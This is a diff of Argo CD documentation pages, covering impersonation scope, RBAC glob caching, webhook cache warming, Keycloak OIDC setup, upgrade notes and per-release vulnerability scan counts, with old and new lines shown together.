<https://pnpm.io/installation>
<https://classic.yarnpkg.com/lang/en/docs/install/>
#### Install `goreman`
@@ -130,7 +130,7 @@ Goreman is used to start all needed processes to get a working Argo CD developme
#### Install required dependencies and build-tools
> [!NOTE]
> The installation instructions are valid for Linux hosts only. Mac instructions will follow shortly.
> The installations instructions are valid for Linux hosts only. Mac instructions will follow shortly.
For installing the tools required to build and test Argo CD on your local system, we provide convenient installer scripts. By default, they will install binaries to `/usr/local/bin` on your system, which might require `root` privileges.


@@ -83,26 +83,6 @@ or a randomly generated password stored in a secret (Argo CD 1.9 and later).
Add `admin.enabled: "false"` to the `argocd-cm` ConfigMap
(see [user management](./operator-manual/user-management/index.md)).
## How to view orphaned resources?
Orphaned Kubernetes resources are top-level namespaced resources that do not belong to any Argo CD Application. For more information, see [Orphaned Resources Monitoring](./user-guide/orphaned-resources.md).
!!! warning
Enabling orphaned resource monitoring has performance implications. If an AppProject monitors a namespace containing many resources not managed by Argo CD (e.g. `kube-system`), it can significantly impact your Argo CD instance. Enable this feature only on projects with well-scoped namespaces.
To view orphaned resources in the Argo CD UI:
1. Click on **Settings** in the sidebar.
2. Click on **Projects**.
3. Select the desired project.
4. Scroll down to the **RESOURCE MONITORING** section.
5. Click **Edit** and enable the monitoring feature.
6. Check **Enable application warning conditions?** to enable warnings.
7. Click **Save**.
8. Navigate back to **Applications** and select an application under the configured project.
9. In the **Sync Panel**, under **APP CONDITIONS**, you will see the orphaned resources warning.
10. Click **Show Orphaned** below the **HEALTH STATUS** filters to display orphaned resources.
## Argo CD cannot deploy Helm Chart-based applications without internet access. How can I solve it?
Argo CD might fail to generate Helm chart manifests if the chart has dependencies located in external repositories. To


@@ -30,7 +30,7 @@ Impersonation requests first authenticate as the requesting user, then switch to
### Feature scope
Impersonation is supported for the lifecycle of objects managed by an Application directly, which includes sync operations (creation, update and pruning of resources) and deletion as part of Application finalizer logic. It is also supported for UI operations triggered by the user.
Impersonation is currently only supported for the lifecycle of objects managed by an Application directly, which includes sync operations (creation, update and pruning of resources) and deletion as part of Application finalizer logic. This *does not* include operations triggered via ArgoCD's UI, which will still be executed with Argo CD's control-plane service account.
## Prerequisites


@@ -230,7 +230,7 @@ p, somerole, applicationsets, get, foo/bar/*, allow
### Using the CLI
You can use all existing Argo CD CLI commands for managing ApplicationSets in other namespaces, exactly as you would use the CLI to manage ApplicationSets in the control plane's namespace.
You can use all existing Argo CD CLI commands for managing applications in other namespaces, exactly as you would use the CLI to manage applications in the control plane's namespace.
For example, to retrieve the `ApplicationSet` named `foo` in the namespace `bar`, you can use the following CLI command:


@@ -14,7 +14,7 @@ The Progressive Syncs feature set is intended to be light and flexible. The feat
- Progressive Syncs watch for the managed Application resources to become "Healthy" before proceeding to the next stage.
- Deployments, DaemonSets, StatefulSets, and [Argo Rollouts](https://argoproj.github.io/argo-rollouts/) are all supported, because the Application enters a "Progressing" state while pods are being rolled out. In fact, any resource with a health check that can report a "Progressing" status is supported.
- [Argo CD Resource Hooks](../../user-guide/sync-waves.md) are supported. We recommend this approach for users that need advanced functionality when an Argo Rollout cannot be used, such as smoke testing after a DaemonSet change.
- [Argo CD Resource Hooks](../../user-guide/resource_hooks.md) are supported. We recommend this approach for users that need advanced functionality when an Argo Rollout cannot be used, such as smoke testing after a DaemonSet change.
## Enabling Progressive Syncs


@@ -150,8 +150,6 @@ data:
server.api.content.types: "application/json"
# Number of webhook requests processed concurrently (default 50)
server.webhook.parallelism.limit: "50"
# Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
server.glob.cache.size: "10000"
# Whether to allow sync with replace checked to go through. Resource-level annotation to replace override this setting, i.e. it's only enforced on the API server level.
server.sync.replace.allowed: "true"


@@ -253,11 +253,6 @@ spec:
megabytes.
The default value is 200. You might need to increase this for an Argo CD instance that manages 3000+ applications.
* The `server.glob.cache.size` config key in `argocd-cmd-params-cm` (or the `--glob-cache-size` server flag) controls
the maximum number of compiled glob patterns cached for RBAC policy evaluation. Glob pattern compilation is expensive,
and caching significantly improves RBAC performance when many applications are managed. The default value is 10000.
See [RBAC Glob Matching](rbac.md#glob-matching) for more details.
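The effect described above (compiling a glob pattern once and reusing it for later RBAC evaluations) can be sketched in Python. Argo CD itself is written in Go, so the helper names and cache mechanism here are illustrative only:

```python
import re
from fnmatch import translate
from functools import lru_cache

@lru_cache(maxsize=10000)  # mirrors the default cache size mentioned above
def compile_glob(pattern: str) -> re.Pattern:
    # Compilation is the expensive step; it runs once per distinct pattern.
    return re.compile(translate(pattern))

def glob_match(pattern: str, value: str) -> bool:
    # Later evaluations of an already-seen pattern reuse the compiled regex.
    return compile_glob(pattern).match(value) is not None
```

Repeated policy checks against the same pattern then pay only the cheap match cost rather than recompiling the pattern on every evaluation.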
### argocd-dex-server, argocd-redis
The `argocd-dex-server` uses an in-memory database, and two or more instances may have inconsistent data.
@@ -438,55 +433,6 @@ spec:
> paths
> provided in the annotation. The application path serves as the deepest path that can be selected as the root.
#### Measuring Annotation Efficiency
You can use the following metrics to evaluate how effectively the `argocd.argoproj.io/manifest-generate-paths`
annotation is reducing unnecessary manifest regeneration:
- **`argocd_webhook_requests_total`** (label: `repo`) — counts incoming webhook events per repository. Use this as the
baseline for how many push events Argo CD is receiving.
- **`argocd_webhook_store_cache_attempts_total`** (labels: `repo`, `successful`) — counts attempts to reuse the previously
cached manifests for the new commit SHA when an application's refresh paths have _not_ changed. A `successful=true`
result means the cache was warmed for the new revision without re-generating manifests, which is the desired outcome.
To assess efficiency, compare the rate of `successful=true` attempts against the total webhook rate. A high ratio
indicates the annotation is working well and preventing unnecessary manifest regeneration.
Note that some `successful=false` results are expected and not a cause for concern — they occur when Argo CD has not
yet cached manifests for an application (e.g. after a restart or first sync), so there is nothing to carry forward to
the new revision.
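As a rough illustration of the comparison described above, the efficiency ratio can be computed from the two metric rates. The function and its inputs are hypothetical helpers, not part of Argo CD:

```python
def cache_warm_efficiency(successful_warm_rate: float, webhook_rate: float) -> float:
    """Fraction of webhook events whose manifests were carried forward from cache.

    successful_warm_rate: rate of argocd_webhook_store_cache_attempts_total{successful="true"}
    webhook_rate: rate of argocd_webhook_requests_total for the same repo
    """
    if webhook_rate <= 0:
        return 0.0
    return successful_warm_rate / webhook_rate
```

A value close to 1.0 suggests the annotation is preventing most unnecessary regeneration; a persistently low value may mean the annotated paths are too broad or manifests are rarely cached.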
#### Disabling Manifest Cache Warming in Webhooks
In some cases, the manifest cache warming done by the webhook handler can hurt performance rather than help it:
- **Plain YAML repositories**: if applications use plain YAML manifests (no Helm or Kustomize rendering), manifest
generation is fast and caching provides little benefit. Attempting to warm the cache for thousands of unaffected
applications on every commit adds significant overhead.
- **Large monorepos**: with many applications sharing a single repository, each webhook event triggers a cache warm
attempt for every application whose paths did not change. With thousands of applications, this can cause the webhook
handler to spend significant time on Redis operations, delaying the actual reconciliation trigger for the affected
application.
When disabled, the webhook handler will only trigger reconciliation for applications whose files have changed and
will skip all Redis cache operations for unaffected applications. This is the recommended setting for large monorepos
with plain YAML manifests.
**Per-repository setting (recommended)**: set `webhookManifestCacheWarmDisabled: true` on the repository via the
ArgoCD CLI or UI:
```bash
argocd repo edit https://github.com/org/repo.git --webhook-manifest-cache-warm-disabled
```
**Global setting**: to disable cache warming for all repositories, set the following environment variable on
`argocd-server`:
```
ARGOCD_WEBHOOK_MANIFEST_CACHE_WARM_DISABLED=true
```
### Application Sync Timeout & Jitter
Argo CD has a timeout for application syncs. It will trigger a refresh for each application periodically when the


@@ -199,7 +199,7 @@ The example below will expose the Argo CD Application labels `team-name` and `en
In this case, the metric would look like:
```
# TYPE argocd_cluster_labels gauge
# TYPE argocd_app_labels gauge
argocd_cluster_labels{label_environment="dev",label_team_name="team1",name="cluster1",server="server1"} 1
argocd_cluster_labels{label_environment="staging",label_team_name="team2",name="cluster2",server="server2"} 1
argocd_cluster_labels{label_environment="production",label_team_name="team3",name="cluster3",server="server3"} 1


@@ -321,10 +321,6 @@ When the `example-user` executes the `extensions/DaemonSet/test` action, the fol
3. The value `action/extensions/DaemonSet/test` matches `action/extensions/*`. Note that `/` is not treated as a separator and the use of `**` is not necessary.
4. The value `default/my-app` matches `default/*`.
> [!TIP]
> For performance tuning of glob pattern matching, see the `server.glob.cache.size` config key in
> [High Availability - argocd-server](high_availability.md#argocd-server).
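The matching behaviour in steps 3 and 4 above (where `/` is not treated as a separator) can be demonstrated with Python's `fnmatch`, whose `*` likewise matches across `/`. This is a sketch of the semantics only, not Argo CD's actual glob engine:

```python
from fnmatch import fnmatch

# "*" crosses "/" because "/" is not a separator in this matching mode
assert fnmatch("action/extensions/DaemonSet/test", "action/extensions/*")
assert fnmatch("default/my-app", "default/*")

# "**" is therefore unnecessary; a single "*" already spans path-like segments
assert fnmatch("action/extensions/DaemonSet/test", "action/*")
```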
## Using SSO Users/Groups
The `scopes` field controls which OIDC scopes to examine during RBAC enforcement (in addition to `sub` scope).


@@ -6,7 +6,6 @@
- [apps/StatefulSet/restart](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/apps/StatefulSet/actions/restart/action.lua)
- [apps/StatefulSet/scale](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/apps/StatefulSet/actions/scale/action.lua)
- [argoproj.io/AnalysisRun/terminate](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/AnalysisRun/actions/terminate/action.lua)
- [argoproj.io/Application/toggle-auto-sync](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Application/actions/toggle-auto-sync/action.lua)
- [argoproj.io/CronWorkflow/create-workflow](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/CronWorkflow/actions/create-workflow/action.lua)
- [argoproj.io/Rollout/abort](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Rollout/actions/abort/action.lua)
- [argoproj.io/Rollout/pause](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Rollout/actions/pause/action.lua)


@@ -22,7 +22,6 @@ argocd-applicationset-controller [flags]
--client-certificate string Path to a client certificate file for TLS
--client-key string Path to a client key file for TLS
--cluster string The name of the kubeconfig cluster to use
--concurrent-application-updates int Number of concurrent Application create/update/delete operations per ApplicationSet reconcile. (default 1)
--concurrent-reconciliations int Max concurrent reconciliations limit for the controller (default 10)
--context string The name of the kubeconfig context to use
--debug Print debug logs. Takes precedence over loglevel


@@ -54,7 +54,6 @@ argocd-server [flags]
--enable-gzip Enable GZIP compression (default true)
--enable-k8s-event none Enable ArgoCD to use k8s event. For disabling all events, set the value as none. (e.g --enable-k8s-event=none), For enabling specific events, set the value as `event reason`. (e.g --enable-k8s-event=StatusRefreshed,ResourceCreated) (default [all])
--enable-proxy-extension Enable Proxy Extension feature
--glob-cache-size int Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
--gloglevel int Set the glog logging level
-h, --help help for argocd-server
--hydrator-enabled Feature flag to enable Hydrator. Default ("false")


@@ -1,7 +1,7 @@
# Verification of Argo CD Artifacts
## Prerequisites
- cosign `v2.0.0` or higher [installation instructions](https://docs.sigstore.dev/cosign/system_config/installation/)
- cosign `v2.0.0` or higher [installation instructions](https://docs.sigstore.dev/cosign/installation)
- slsa-verifier [installation instructions](https://github.com/slsa-framework/slsa-verifier#installation)
- crane [installation instructions](https://github.com/google/go-containerregistry/blob/main/cmd/crane/README.md) (for container verification only)
@@ -154,4 +154,4 @@ slsa-verifier verify-artifact sbom.tar.gz \
> [!NOTE]
> We encourage all users to verify signatures and provenances with your admission/policy controller of choice. Doing so will verify that an image was built by us before it's deployed on your Kubernetes cluster.
Cosign signatures and SLSA provenances are compatible with several types of admission controllers. Please see the [cosign documentation](https://docs.sigstore.dev/policy-controller/overview/) and [slsa-github-generator](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/container/README.md#verification) for supported controllers.
Cosign signatures and SLSA provenances are compatible with several types of admission controllers. Please see the [cosign documentation](https://docs.sigstore.dev/cosign/overview/#kubernetes-integrations) and [slsa-github-generator](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/container/README.md#verification) for supported controllers.


@@ -1,2 +1,5 @@
This page is populated for released Argo CD versions. Use the version selector to view this table for a specific
version.
| Argo CD version | Kubernetes versions |
|-----------------|---------------------|
| 3.4 | v1.35, v1.34, v1.33, v1.32 |
| 3.3 | v1.35, v1.34, v1.33, v1.32 |
| 3.2 | v1.34, v1.33, v1.32, v1.31 |


@@ -1,40 +0,0 @@
# v3.4 to v3.5
## Breaking Changes
## Behavioral Improvements / Fixes
### Impersonation extended to server operations
When [impersonation](../app-sync-using-impersonation.md) is enabled, it now applies to all API server operations, not just sync operations. This means that actions triggered through the UI or API (viewing logs, listing events, deleting resources, running resource actions, etc.) will use the impersonated service account derived from the AppProject's `destinationServiceAccounts` configuration.
Previously, impersonation only applied to sync operations.
**Affected operations and required permissions:**
| Operation | Kubernetes API call | Required RBAC verbs |
|---|---|---|
| Get resource | `GET` on the target resource | `get` |
| Patch resource | `PATCH` on the target resource | `get`, `patch` |
| Delete resource | `DELETE` on the target resource | `delete` |
| List resource events | `LIST` on `events` (core/v1) | `list` |
| View pod logs | `GET` on `pods` and `pods/log` | `get` |
| Run resource action | `GET`, `CREATE`, `PATCH` on the target resource | `get`, `create`, `patch` |
This list covers built-in operations. Custom resource actions may require additional permissions depending on what Kubernetes API calls they make.
Users with impersonation enabled must ensure the service accounts configured in `destinationServiceAccounts` have permissions for these operations.
No action is required for users who do not have impersonation enabled.
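As an example, a namespace-scoped Role covering the verbs from the table above for Deployments, events, and Pod logs might look like the following sketch. The name, namespace, and resource list are illustrative and should be adapted to the resources your Application actually manages:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: argocd-impersonation-example  # illustrative name
  namespace: default
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["get", "patch", "create", "delete"]  # get/patch/delete resource, run resource actions
  - apiGroups: [""]
    resources: ["events"]
    verbs: ["list"]                              # list resource events
  - apiGroups: [""]
    resources: ["pods", "pods/log"]
    verbs: ["get"]                               # view pod logs
```

Bind such a Role to the service account referenced in the project's `destinationServiceAccounts` with a RoleBinding in the target namespace.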
## API Changes
## Security Changes
## Deprecated Items
## Kustomize Upgraded
## Helm Upgraded
## Custom Healthchecks Added


@@ -39,7 +39,6 @@ kubectl apply -n argocd --server-side --force-conflicts -f https://raw.githubuse
<hr/>
- [v3.4 to v3.5](./3.4-3.5.md)
- [v3.3 to v3.4](./3.3-3.4.md)
- [v3.2 to v3.3](./3.2-3.3.md)
- [v3.1 to v3.2](./3.1-3.2.md)


@@ -1,21 +1,21 @@
# Keycloak
Keycloak and Argo CD integration can be configured in two ways: with Client authentication and with PKCE.
Keycloak and ArgoCD integration can be configured in two ways with Client authentication and with PKCE.
If you need to authenticate with __argo-cd command line__, you must choose PKCE way.
* [Keycloak and Argo CD with Client authentication](#keycloak-and-argocd-with-client-authentication)
* [Keycloak and Argo CD with PKCE](#keycloak-and-argocd-with-pkce)
* [Keycloak and ArgoCD with Client authentication](#keycloak-and-argocd-with-client-authentication)
* [Keycloak and ArgoCD with PKCE](#keycloak-and-argocd-with-pkce)
## Keycloak and Argo CD with Client authentication
## Keycloak and ArgoCD with Client authentication
These instructions will take you through the entire process of getting your Argo CD application to authenticate with Keycloak.
These instructions will take you through the entire process of getting your ArgoCD application authenticating with Keycloak.
Start by creating a client within Keycloak and configure Argo CD to use Keycloak for authentication, using groups set in Keycloak
You will create a client within Keycloak and configure ArgoCD to use Keycloak for authentication, using groups set in Keycloak
to determine privileges in Argo.
### Creating a new client in Keycloak
First, setup a new client.
First we need to setup a new client.
Start by logging into your keycloak server, select the realm you want to use (`master` by default)
and then go to __Clients__ and click the __Create client__ button at the top.
@@ -37,11 +37,11 @@ but it's not recommended in production).
Make sure to click __Save__.
There should be a tab called __Credentials__. You can copy the Client Secret that we'll use in our Argo CD configuration.
There should be a tab called __Credentials__. You can copy the Client Secret that we'll use in our ArgoCD configuration.
![Keycloak client secret](../../assets/keycloak-client-secret.png "Keycloak client secret")
### Configuring Argo CD OIDC
### Configuring ArgoCD OIDC
Let's start by storing the client secret you generated earlier in the argocd secret _argocd-secret_.
@@ -68,7 +68,7 @@ data:
clientID: argocd
clientSecret: $oidc.keycloak.clientSecret
refreshTokenThreshold: 2m
requestedScopes: ["openid", "profile", "email", "groups", "offline_access"]
requestedScopes: ["openid", "profile", "email", "groups"]
```
Make sure that:
@@ -80,18 +80,18 @@ Make sure that:
- __requestedScopes__ contains the _groups_ claim if you didn't add it to the Default scopes
- __refreshTokenThreshold__ is less than the client token lifetime. If this setting is not less than the token lifetime, a new token will be obtained for every request. Keycloak sets the client token lifetime to 5 minutes by default.
## Keycloak and Argo CD with PKCE
## Keycloak and ArgoCD with PKCE
These instructions will take you through the entire process of getting your Argo CD application authenticating with Keycloak.
These instructions will take you through the entire process of getting your ArgoCD application authenticating with Keycloak.
You will create a client within Keycloak and configure Argo CD to use Keycloak for authentication, using groups set in Keycloak
You will create a client within Keycloak and configure ArgoCD to use Keycloak for authentication, using groups set in Keycloak
to determine privileges in Argo.
You will also be able to authenticate using argo-cd command line.
### Creating a new client in Keycloak
First, setup a new client.
First we need to setup a new client.
Start by logging into your keycloak server, select the realm you want to use (`master` by default)
and then go to __Clients__ and click the __Create client__ button at the top.
@@ -119,7 +119,7 @@ Now go to a tab called __Advanced__, look for parameter named __Proof Key for Co
![Keycloak configure client Step 2](../../assets/keycloak-configure-client-pkce_2.png "Keycloak configure client Step 2")
Make sure to click __Save__.
### Configuring Argo CD OIDC
### Configuring ArgoCD OIDC
Now we can configure the config map and add the oidc configuration to enable our keycloak authentication.
You can use `$ kubectl edit configmap argocd-cm`.
@@ -138,7 +138,7 @@ data:
clientID: argocd
enablePKCEAuthentication: true
refreshTokenThreshold: 2m
requestedScopes: ["openid", "profile", "email", "groups", "offline_access"]
requestedScopes: ["openid", "profile", "email", "groups"]
```
Make sure that:
@@ -146,13 +146,13 @@ Make sure that:
- __issuer__ ends with the correct realm (in this example _master_)
- __issuer__: on Keycloak releases older than version 17, the URL must include /auth (in this example /auth/realms/master)
- __clientID__ is set to the Client ID you configured in Keycloak
- __enablePKCEAuthentication__ must be set to true to enable correct Argo CD behaviour with PKCE
- __enablePKCEAuthentication__ must be set to true to enable correct ArgoCD behaviour with PKCE
- __requestedScopes__ contains the _groups_ claim if you didn't add it to the Default scopes
- __refreshTokenThreshold__ is less than the client token lifetime. If this setting is not less than the token lifetime, a new token will be obtained for every request. Keycloak sets the client token lifetime to 5 minutes by default.
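Putting the pieces together, a minimal sketch of the resulting argocd-cm, assuming hypothetical hostnames `argocd.example.com` and `keycloak.example.com` and the default `master` realm:

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-cm
  namespace: argocd
data:
  url: https://argocd.example.com
  oidc.config: |
    name: Keycloak
    issuer: https://keycloak.example.com/realms/master
    clientID: argocd
    enablePKCEAuthentication: true
    refreshTokenThreshold: 2m
    requestedScopes: ["openid", "profile", "email", "groups"]
```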
## Configuring the groups claim
In order for Argo CD to provide the groups the user is in, we need to configure a groups claim that can be included in the authentication token.
In order for ArgoCD to provide the groups the user is in, we need to configure a groups claim that can be included in the authentication token.
To do this we'll start by creating a new __Client Scope__ called _groups_.
@@ -174,7 +174,7 @@ Go back to the client we've created earlier and go to the Tab "Client Scopes".
Click on "Add client scope", choose the _groups_ scope and add it either to the __Default__ or to the __Optional__ Client Scope.
If you put it in the Optional
category you will need to make sure that Argo CD requests the scope in its OIDC configuration.
category you will need to make sure that ArgoCD requests the scope in its OIDC configuration.
Since we will always want group information, I recommend
using the Default category.
@@ -184,7 +184,7 @@ Create a group called _ArgoCDAdmins_ and have your current user join the group.
![Keycloak user group](../../assets/keycloak-user-group.png "Keycloak user group")
## Configuring Argo CD Policy
## Configuring ArgoCD Policy
Now that we have authentication that provides groups, we want to apply a policy to these groups.
We can modify the _argocd-rbac-cm_ ConfigMap using `$ kubectl edit configmap argocd-rbac-cm`.
@@ -205,7 +205,7 @@ In this example we give the role _role:admin_ to all users in the group _ArgoCDA
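The group-to-role binding described above can be sketched as a single `policy.csv` line in _argocd-rbac-cm_ (namespace assumed to be the default `argocd`):

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-rbac-cm
  namespace: argocd
data:
  # Grant the built-in admin role to members of the Keycloak group ArgoCDAdmins
  policy.csv: |
    g, ArgoCDAdmins, role:admin
```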
You can now log in using our new Keycloak OIDC authentication:
![Keycloak Argo CD login](../../assets/keycloak-login.png "Keycloak Argo CD login")
![Keycloak ArgoCD login](../../assets/keycloak-login.png "Keycloak ArgoCD login")
If you have used PKCE method, you can also authenticate using command line:
```bash
@@ -219,7 +219,7 @@ Once done, you should see
![Authentication successful!](../../assets/keycloak-authentication-successful.png "Authentication successful!")
## Troubleshoot
If Argo CD auth returns 401, or the login attempt leads to a redirect loop, restart the argocd-server pod.
If ArgoCD auth returns 401, or the login attempt leads to a redirect loop, restart the argocd-server pod.
```
kubectl rollout restart deployment argocd-server -n argocd
```


@@ -13,71 +13,52 @@ recent minor releases.
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](master/argocd-test.html) | 0 | 2 | 4 | 0 |
| [go.mod](master/argocd-test.html) | 0 | 2 | 12 | 0 |
| [hack/get-previous-release/go.mod](master/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](master/argocd-test.html) | 0 | 9 | 10 | 2 |
| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 0 | 1 | 0 |
| [gitops-engine/go.mod](master/argocd-test.html) | 0 | 0 | 2 | 0 |
| [go.mod](master/argocd-test.html) | 0 | 0 | 6 | 0 |
| [ui/yarn.lock](master/argocd-test.html) | 0 | 4 | 5 | 2 |
| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 1 | 0 | 1 | 0 |
| [haproxy:3.0.8-alpine](master/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](master/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 6 | 4 |
| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 9 | 10 |
| [install.yaml](master/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](master/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.4.0-rc4
### v3.3.2
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 2 | 4 | 0 |
| [go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 6 | 14 | 0 |
| [hack/get-previous-release/go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.4.0-rc4/argocd-test.html) | 0 | 9 | 11 | 2 |
| [dex:v2.45.0](v3.4.0-rc4/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 0 | 1 | 0 |
| [haproxy:3.0.8-alpine](v3.4.0-rc4/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.4.0-rc4/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.4.0-rc3](v3.4.0-rc4/quay.io_argoproj_argocd_v3.4.0-rc3.html) | 0 | 0 | 6 | 4 |
| [install.yaml](v3.4.0-rc4/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.4.0-rc4/argocd-iac-namespace-install.html) | - | - | - | - |
| [gitops-engine/go.mod](v3.3.2/argocd-test.html) | 0 | 0 | 2 | 0 |
| [go.mod](v3.3.2/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.3.2/argocd-test.html) | 0 | 6 | 7 | 2 |
| [dex:v2.43.0](v3.3.2/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.3.2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.3.2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.3.2](v3.3.2/quay.io_argoproj_argocd_v3.3.2.html) | 0 | 0 | 9 | 12 |
| [install.yaml](v3.3.2/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.3.2/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.3.6
### v3.2.7
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](v3.3.6/argocd-test.html) | 0 | 2 | 5 | 1 |
| [go.mod](v3.3.6/argocd-test.html) | 0 | 4 | 13 | 1 |
| [hack/get-previous-release/go.mod](v3.3.6/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.3.6/argocd-test.html) | 0 | 11 | 13 | 2 |
| [dex:v2.43.0](v3.3.6/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.3.6/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.3.6/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.3.6](v3.3.6/quay.io_argoproj_argocd_v3.3.6.html) | 0 | 0 | 6 | 6 |
| [install.yaml](v3.3.6/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.3.6/argocd-iac-namespace-install.html) | - | - | - | - |
| [go.mod](v3.2.7/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.2.7/argocd-test.html) | 0 | 6 | 9 | 2 |
| [dex:v2.43.0](v3.2.7/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.2.7/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.2-alpine](v3.2.7/public.ecr.aws_docker_library_redis_8.2.2-alpine.html) | 0 | 1 | 0 | 13 |
| [argocd:v3.2.7](v3.2.7/quay.io_argoproj_argocd_v3.2.7.html) | 0 | 0 | 0 | 1 |
| [install.yaml](v3.2.7/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.2.7/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.2.8
### v3.1.12
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [go.mod](v3.2.8/argocd-test.html) | 1 | 5 | 13 | 1 |
| [hack/get-previous-release/go.mod](v3.2.8/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.2.8/argocd-test.html) | 0 | 11 | 15 | 2 |
| [dex:v2.43.0](v3.2.8/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.2.8/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.2-alpine](v3.2.8/public.ecr.aws_docker_library_redis_8.2.2-alpine.html) | 0 | 1 | 0 | 13 |
| [argocd:v3.2.8](v3.2.8/quay.io_argoproj_argocd_v3.2.8.html) | 0 | 0 | 0 | 1 |
| [install.yaml](v3.2.8/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.2.8/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.1.13
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [go.mod](v3.1.13/argocd-test.html) | 1 | 3 | 12 | 0 |
| [hack/get-previous-release/go.mod](v3.1.13/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.1.13/argocd-test.html) | 1 | 11 | 13 | 2 |
| [dex:v2.43.0](v3.1.13/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.1.13/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:7.2.11-alpine](v3.1.13/public.ecr.aws_docker_library_redis_7.2.11-alpine.html) | 0 | 1 | 0 | 11 |
| [argocd:v3.1.13](v3.1.13/quay.io_argoproj_argocd_v3.1.13.html) | 0 | 0 | 7 | 7 |
| [install.yaml](v3.1.13/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.1.13/argocd-iac-namespace-install.html) | - | - | - | - |
| [go.mod](v3.1.12/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.1.12/argocd-test.html) | 1 | 6 | 9 | 2 |
| [dex:v2.43.0](v3.1.12/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.1.12/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:7.2.11-alpine](v3.1.12/public.ecr.aws_docker_library_redis_7.2.11-alpine.html) | 0 | 1 | 0 | 11 |
| [argocd:v3.1.12](v3.1.12/quay.io_argoproj_argocd_v3.1.12.html) | 0 | 0 | 18 | 27 |
| [install.yaml](v3.1.12/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.1.12/argocd-iac-namespace-install.html) | - | - | - | - |


